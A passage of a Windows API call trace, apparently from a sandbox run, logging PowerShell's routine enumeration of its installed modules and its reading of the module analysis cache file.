dwReserved0=0x0, dwReserved1=0x0, cFileName="PowerShellGet", cAlternateFileName="POWERS~1")) returned 1 [0218.253] FindNextFileW (in: hFindFile=0x784d9c0, lpFindFileData=0x933e78c | out: lpFindFileData=0x933e78c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17bfc901, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x4631b23a, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x4631b23a, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSReadline", cAlternateFileName="PSREAD~1")) returned 1 [0218.253] FindNextFileW (in: hFindFile=0x784d9c0, lpFindFileData=0x933e78c | out: lpFindFileData=0x933e78c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0218.253] FindClose (in: hFindFile=0x784d9c0 | out: hFindFile=0x784d9c0) returned 1 [0218.253] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x933ea14) returned 1 [0218.253] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x933ea20) returned 1 [0218.253] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Modules.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\modules.psd1")) returned 0xffffffff [0218.254] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Modules.psm1" (normalized: "c:\\program files\\windowspowershell\\modules\\modules.psm1")) returned 0xffffffff [0218.254] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Modules.cdxml" (normalized: "c:\\program files\\windowspowershell\\modules\\modules.cdxml")) returned 0xffffffff [0218.254] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Modules.xaml" (normalized: "c:\\program files\\windowspowershell\\modules\\modules.xaml")) returned 0xffffffff [0218.254] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Modules.ni.dll" (normalized: "c:\\program files\\windowspowershell\\modules\\modules.ni.dll")) returned 0xffffffff [0218.254] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Modules.dll" (normalized: "c:\\program files\\windowspowershell\\modules\\modules.dll")) returned 0xffffffff [0218.255] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Microsoft.PowerShell.Operation.Validation", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x55 [0218.255] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Microsoft.PowerShell.Operation.Validation", nBufferLength=0x55, lpBuffer=0x323c478, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Microsoft.PowerShell.Operation.Validation", lpFilePart=0x0) returned 0x54 [0218.255] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x933e9e8) returned 1 [0218.255] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Microsoft.PowerShell.Operation.Validation" (normalized: "c:\\program files\\windowspowershell\\modules\\microsoft.powershell.operation.validation"), fInfoLevelId=0x0, lpFileInformation=0x933ea64 | out: lpFileInformation=0x933ea64*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17bd669e, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xb50744c4, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x17bd669e, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0218.256] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x933e9e4) returned 1 [0218.256] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3d [0218.256] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement", nBufferLength=0x3d, lpBuffer=0x323c478, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement", lpFilePart=0x0) returned 0x3c [0218.256] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x933e9e8) returned 1 [0218.256] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement"), fInfoLevelId=0x0, lpFileInformation=0x933ea64 | out: lpFileInformation=0x933ea64*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17bfc901, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xb50eaa6c, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x17bfc901, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0218.257] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x933e9e4) returned 1 [0218.257] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x32 [0218.257] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester", nBufferLength=0x32, lpBuffer=0x323c478, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester", lpFilePart=0x0) returned 0x31 [0218.257] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x933e9e8) returned 1 [0218.257] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester" (normalized: "c:\\program files\\windowspowershell\\modules\\pester"), fInfoLevelId=0x0, lpFileInformation=0x933ea64 | out: lpFileInformation=0x933ea64*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17bfc901, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x462363f6, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x462363f6, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0218.258] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x933e9e4) returned 1 [0218.258] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x39 [0218.258] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet", nBufferLength=0x39, lpBuffer=0x323c478, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet", lpFilePart=0x0) returned 0x38 [0218.259] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x933e9e8) returned 1 [0218.259] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget"), fInfoLevelId=0x0, lpFileInformation=0x933ea64 | out: lpFileInformation=0x933ea64*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17bfc901, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xb53eacff, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x17bfc901, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0218.259] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x933e9e4) returned 1 [0218.260] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x36 [0218.260] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline", nBufferLength=0x36, lpBuffer=0x323c478, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline", lpFilePart=0x0) returned 0x35 [0218.260] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x933e9e8) returned 1 [0218.260] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline" (normalized: "c:\\program files\\windowspowershell\\modules\\psreadline"), fInfoLevelId=0x0, lpFileInformation=0x933ea64 | out: lpFileInformation=0x933ea64*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17bfc901, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x4631b23a, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x4631b23a, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0218.260] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x933e9e4) returned 1 [0218.260] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x933ea58) returned 1 [0218.260] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Microsoft.PowerShell.Operation.Validation", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x55 [0218.260] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Microsoft.PowerShell.Operation.Validation", nBufferLength=0x55, lpBuffer=0x323c478, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Microsoft.PowerShell.Operation.Validation", lpFilePart=0x0) returned 0x54 [0218.260] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Microsoft.PowerShell.Operation.Validation\\*", lpFindFileData=0x933e780 | out: lpFindFileData=0x933e780*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17bd669e, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xb50744c4, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x17bd669e, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x784d740 [0218.261] FindNextFileW (in: hFindFile=0x784d740, lpFindFileData=0x933e78c | out: lpFindFileData=0x933e78c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17bd669e, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xb50744c4, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x17bd669e, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0218.261] FindNextFileW (in: hFindFile=0x784d740, lpFindFileData=0x933e78c | out: lpFindFileData=0x933e78c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17bd669e, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xb50df8d3, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a54419a, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1.0.1", cAlternateFileName="103623~1.1")) returned 1 [0218.261] FindNextFileW (in: hFindFile=0x784d740, lpFindFileData=0x933e78c | out: lpFindFileData=0x933e78c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0218.261] FindClose (in: hFindFile=0x784d740 | out: hFindFile=0x784d740) returned 1 [0218.261] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x933ea14) returned 1 [0218.262] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x933ea20) returned 1 [0218.262] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Microsoft.PowerShell.Operation.Validation\\1.0.1\\Microsoft.PowerShell.Operation.Validation.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x8a [0218.262] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Microsoft.PowerShell.Operation.Validation\\1.0.1\\Microsoft.PowerShell.Operation.Validation.psd1", nBufferLength=0x8a, lpBuffer=0x323c478, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Microsoft.PowerShell.Operation.Validation\\1.0.1\\Microsoft.PowerShell.Operation.Validation.psd1", lpFilePart=0x0) returned 0x89 [0218.262] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x933e9ec) returned 1 [0218.262] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Microsoft.PowerShell.Operation.Validation\\1.0.1\\Microsoft.PowerShell.Operation.Validation.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\microsoft.powershell.operation.validation\\1.0.1\\microsoft.powershell.operation.validation.psd1"), fInfoLevelId=0x0, lpFileInformation=0x933ea68 | out: lpFileInformation=0x933ea68*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x96e19133, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x96e19133, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x96e19133, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x614)) returned 1 [0218.293] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x933e9e8) returned 1 [0218.294] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Microsoft.PowerShell.Operation.Validation\\1.0.1\\Microsoft.PowerShell.Operation.Validation.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x8a [0218.294] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Microsoft.PowerShell.Operation.Validation\\1.0.1\\Microsoft.PowerShell.Operation.Validation.psd1", nBufferLength=0x8a, lpBuffer=0x323c478, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Microsoft.PowerShell.Operation.Validation\\1.0.1\\Microsoft.PowerShell.Operation.Validation.psd1", lpFilePart=0x0) returned 0x89 [0218.295] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Microsoft.PowerShell.Operation.Validation\\1.0.1\\Microsoft.PowerShell.Operation.Validation.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x8a [0218.295] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Microsoft.PowerShell.Operation.Validation\\1.0.1\\Microsoft.PowerShell.Operation.Validation.psd1", nBufferLength=0x8a, lpBuffer=0x323c478, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Microsoft.PowerShell.Operation.Validation\\1.0.1\\Microsoft.PowerShell.Operation.Validation.psd1", lpFilePart=0x0) returned 0x89 [0218.295] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x933ea10) returned 1 [0218.296] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Microsoft.PowerShell.Operation.Validation\\1.0.1\\Microsoft.PowerShell.Operation.Validation.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\microsoft.powershell.operation.validation\\1.0.1\\microsoft.powershell.operation.validation.psd1"), fInfoLevelId=0x0, lpFileInformation=0x57958b0 | out: lpFileInformation=0x57958b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x96e19133, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x96e19133, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x96e19133, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x614)) returned 1 [0218.296] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x933ea0c) returned 1 [0218.328] GetEnvironmentVariableW (in: lpName="PSModuleAnalysisCachePath", lpBuffer=0x933da78, nSize=0xc3 | out: lpBuffer="䭀̤䅸ض?ळ玡၀澪က澪က澪᝖玺⛭ﰖက澪澵\x01耀䭀̤䭀̤쟘ݝ?ळ獔烖\x02") returned 0x0 [0218.329] CoTaskMemAlloc (cb=0x20c) returned 0x785d2d8 [0218.329] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x785d2d8 | out: pszPath="C:\\Users\\FD1HVy\\AppData\\Local") returned 0x0 [0218.330] CoTaskMemFree (pv=0x785d2d8) [0218.330] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x1e [0218.330] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local", nBufferLength=0x1e, lpBuffer=0x323c478, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local", lpFilePart=0x0) returned 0x1d [0218.330] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\ModuleAnalysisCache" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\microsoft\\windows\\powershell\\moduleanalysiscache")) returned 0x20 [0218.333] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\ModuleAnalysisCache", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x4f [0218.333] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\ModuleAnalysisCache", nBufferLength=0x4f, lpBuffer=0x323c478, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\ModuleAnalysisCache", lpFilePart=0x0) returned 0x4e [0218.333] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x933e218) returned 1 [0218.333] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\ModuleAnalysisCache" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\microsoft\\windows\\powershell\\moduleanalysiscache"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x87c [0218.333] GetFileType (hFile=0x87c) returned 0x1 [0218.333] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x933e214) returned 1 [0218.333] GetFileType (hFile=0x87c) returned 0x1 [0218.334] ReadFile (in: hFile=0x87c, lpBuffer=0x5796a54, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x933e28c, lpOverlapped=0x0 | out: lpBuffer=0x5796a54*, lpNumberOfBytesRead=0x933e28c*=0x1000, lpOverlapped=0x0) returned 1 [0218.389] ReadFile (in: hFile=0x87c, lpBuffer=0x5796631, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x933e294, lpOverlapped=0x0 | out: lpBuffer=0x5796631*, lpNumberOfBytesRead=0x933e294*=0x4, lpOverlapped=0x0) returned 1 [0218.500] ReadFile (in: hFile=0x87c, lpBuffer=0x5796a54, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x933e294, lpOverlapped=0x0 | out: lpBuffer=0x5796a54*, lpNumberOfBytesRead=0x933e294*=0x1000, lpOverlapped=0x0) returned 1 [0218.501] ReadFile (in: hFile=0x87c, lpBuffer=0x5796632, nNumberOfBytesToRead=0x9, lpNumberOfBytesRead=0x933e294, lpOverlapped=0x0 | out: lpBuffer=0x5796632*, lpNumberOfBytesRead=0x933e294*=0x9, lpOverlapped=0x0) returned 1 [0218.501] ReadFile (in: hFile=0x87c, lpBuffer=0x5796a54, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x933e294, lpOverlapped=0x0 | out: lpBuffer=0x5796a54*, lpNumberOfBytesRead=0x933e294*=0x1000, lpOverlapped=0x0) returned 1 [0218.501] ReadFile (in: hFile=0x87c, lpBuffer=0x5796633, nNumberOfBytesToRead=0x5, lpNumberOfBytesRead=0x933e294, lpOverlapped=0x0 | out: lpBuffer=0x5796633*, lpNumberOfBytesRead=0x933e294*=0x5, lpOverlapped=0x0) returned 1 [0218.502] ReadFile (in: hFile=0x87c, lpBuffer=0x5796a54, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x933e294, lpOverlapped=0x0 | out: lpBuffer=0x5796a54*, lpNumberOfBytesRead=0x933e294*=0x1000, lpOverlapped=0x0) returned 1 [0218.502] ReadFile (in: hFile=0x87c, lpBuffer=0x5796645, nNumberOfBytesToRead=0x5, lpNumberOfBytesRead=0x933e294, lpOverlapped=0x0 | out: lpBuffer=0x5796645*, lpNumberOfBytesRead=0x933e294*=0x5, lpOverlapped=0x0) returned 1 [0218.503] ReadFile (in: hFile=0x87c, lpBuffer=0x5796a54, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x933e294, lpOverlapped=0x0 | out: lpBuffer=0x5796a54*, lpNumberOfBytesRead=0x933e294*=0x1000, lpOverlapped=0x0) returned 1 [0218.503] ReadFile (in: hFile=0x87c, lpBuffer=0x5796644, nNumberOfBytesToRead=0x6, lpNumberOfBytesRead=0x933e294, lpOverlapped=0x0 | out: lpBuffer=0x5796644*, lpNumberOfBytesRead=0x933e294*=0x6, lpOverlapped=0x0) returned 1 [0218.503] ReadFile (in: hFile=0x87c, lpBuffer=0x5796a54, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x933e294, lpOverlapped=0x0 | out: lpBuffer=0x5796a54*, lpNumberOfBytesRead=0x933e294*=0x1000, lpOverlapped=0x0) returned 1 [0218.503] ReadFile (in: hFile=0x87c, lpBuffer=0x5796645, nNumberOfBytesToRead=0x3a, lpNumberOfBytesRead=0x933e294, lpOverlapped=0x0 | out: lpBuffer=0x5796645*, lpNumberOfBytesRead=0x933e294*=0x3a, lpOverlapped=0x0) returned 1 [0218.504] ReadFile (in: hFile=0x87c, lpBuffer=0x5796a54, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x933e294, lpOverlapped=0x0 | out: lpBuffer=0x5796a54*, lpNumberOfBytesRead=0x933e294*=0x1000, lpOverlapped=0x0) returned 1 [0218.504] ReadFile (in: hFile=0x87c, lpBuffer=0x579663e, nNumberOfBytesToRead=0x3, lpNumberOfBytesRead=0x933e294, lpOverlapped=0x0 | out: lpBuffer=0x579663e*, lpNumberOfBytesRead=0x933e294*=0x3, lpOverlapped=0x0) returned 1 [0218.504] ReadFile (in: hFile=0x87c, lpBuffer=0x5796a54, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x933e294, lpOverlapped=0x0 | out: lpBuffer=0x5796a54*, lpNumberOfBytesRead=0x933e294*=0x1000, lpOverlapped=0x0) returned 1 [0218.505] ReadFile (in: hFile=0x87c, lpBuffer=0x5796631, nNumberOfBytesToRead=0xe, lpNumberOfBytesRead=0x933e294, lpOverlapped=0x0 | out: lpBuffer=0x5796631*, lpNumberOfBytesRead=0x933e294*=0xe, lpOverlapped=0x0) returned 1 [0218.505] ReadFile (in: hFile=0x87c, lpBuffer=0x5796a54, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x933e294, lpOverlapped=0x0 | out: lpBuffer=0x5796a54*, lpNumberOfBytesRead=0x933e294*=0x1000, lpOverlapped=0x0) returned 1 [0218.506] ReadFile (in: hFile=0x87c, lpBuffer=0x579662f, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x933e280, lpOverlapped=0x0 | out: lpBuffer=0x579662f*, lpNumberOfBytesRead=0x933e280*=0x1, lpOverlapped=0x0) returned 1 [0218.506] ReadFile (in: hFile=0x87c, lpBuffer=0x5796a54, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x933e294, lpOverlapped=0x0 | out: lpBuffer=0x5796a54*, lpNumberOfBytesRead=0x933e294*=0x1000, lpOverlapped=0x0) returned 1 [0218.506] ReadFile (in: hFile=0x87c, lpBuffer=0x5796630, nNumberOfBytesToRead=0x12, lpNumberOfBytesRead=0x933e294, lpOverlapped=0x0 | out: lpBuffer=0x5796630*, lpNumberOfBytesRead=0x933e294*=0x12, lpOverlapped=0x0) returned 1 [0218.506] ReadFile (in: hFile=0x87c, lpBuffer=0x5796a54, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x933e294, lpOverlapped=0x0 | out: lpBuffer=0x5796a54*, lpNumberOfBytesRead=0x933e294*=0x1000, lpOverlapped=0x0) returned 1 [0218.507] ReadFile (in: hFile=0x87c, lpBuffer=0x579663e, nNumberOfBytesToRead=0x3, lpNumberOfBytesRead=0x933e294, lpOverlapped=0x0 | out: lpBuffer=0x579663e*, lpNumberOfBytesRead=0x933e294*=0x3, lpOverlapped=0x0) returned 1 [0218.507] ReadFile (in: hFile=0x87c, lpBuffer=0x5796a54, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x933e294, lpOverlapped=0x0 | out: lpBuffer=0x5796a54*, lpNumberOfBytesRead=0x933e294*=0xd4c, lpOverlapped=0x0) returned 1 [0218.507] GetEnvironmentVariableW (in: lpName="PSDisableModuleAnalysisCacheCleanup", lpBuffer=0x933e0f8, nSize=0xc3 | out: lpBuffer="") returned 0x0 [0218.510] QueryUnbiasedInterruptTime (in: UnbiasedTime=0x933e23c | out: UnbiasedTime=0x933e23c) returned 1 [0218.610] QueryUnbiasedInterruptTime (in: UnbiasedTime=0x933e22c | out: UnbiasedTime=0x933e22c) returned 1 [0218.611] CloseHandle (hObject=0x87c) returned 1 [0218.613] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Microsoft.PowerShell.Operation.Validation\\Microsoft.PowerShell.Operation.Validation.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\microsoft.powershell.operation.validation\\microsoft.powershell.operation.validation.psd1")) returned 0xffffffff [0218.613] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Microsoft.PowerShell.Operation.Validation\\Microsoft.PowerShell.Operation.Validation.psm1" (normalized: "c:\\program files\\windowspowershell\\modules\\microsoft.powershell.operation.validation\\microsoft.powershell.operation.validation.psm1")) returned 0xffffffff [0218.613] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Microsoft.PowerShell.Operation.Validation\\Microsoft.PowerShell.Operation.Validation.cdxml" (normalized: "c:\\program files\\windowspowershell\\modules\\microsoft.powershell.operation.validation\\microsoft.powershell.operation.validation.cdxml")) returned 0xffffffff [0218.614] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Microsoft.PowerShell.Operation.Validation\\Microsoft.PowerShell.Operation.Validation.xaml" (normalized: "c:\\program files\\windowspowershell\\modules\\microsoft.powershell.operation.validation\\microsoft.powershell.operation.validation.xaml")) returned 0xffffffff [0218.614] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Microsoft.PowerShell.Operation.Validation\\Microsoft.PowerShell.Operation.Validation.ni.dll" (normalized: "c:\\program files\\windowspowershell\\modules\\microsoft.powershell.operation.validation\\microsoft.powershell.operation.validation.ni.dll")) returned 0xffffffff [0218.614] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Microsoft.PowerShell.Operation.Validation\\Microsoft.PowerShell.Operation.Validation.dll" (normalized: "c:\\program 